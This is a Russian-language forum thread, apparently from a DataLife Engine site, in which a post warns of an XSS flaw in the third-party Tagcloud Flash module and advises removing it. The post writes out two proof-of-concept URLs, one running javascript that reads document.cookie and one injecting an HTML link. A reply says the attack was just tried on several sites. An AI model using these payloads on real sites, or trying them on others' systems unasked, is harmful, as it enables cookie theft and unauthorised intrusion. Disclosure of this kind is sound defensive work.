celsoft 6 076 Опубликовано: 7 февраля 2010 Рассказать Опубликовано: 7 февраля 2010 Сегодня пришла информация о наличии уязвимости в стороннем модуле Tagcloud (вывод трехмерного облака тегов), т.к. это сторонний модуль и не входит в состав DLE, мы не публикуем исправления для него, а лишь настоятельно рекомендуем убрать с сайта этот сторонний модуль, если он у вас стоит Данная уязвимость идентична XSS уязвимости в 3D Cloud для Joomla (http://websecurity.com.ua/3883/). Про миллионы флешек tagcloud.swf уязвимых к XSS атакам я упоминал в своей статье XSS уязвимости в 34 миллионах флеш файлах (http://websecurity.com.ua/3842/). XSS: http://site/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E Код исполнится при клике. Это Strictly social XSS. Также можно провести HTML Injection атаку, в том числе на те флешки, где запрещены (в флешках или через WAF) javascript и vbscript URI в параметре tagcloud. HTML Injection: http://site/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E Уязвимы все версии плагина Tagcloud. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 7 февраля 2010 Рассказать Опубликовано: 7 февраля 2010 Ого реально работает! Только-что проверил на нескольких сайтах Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.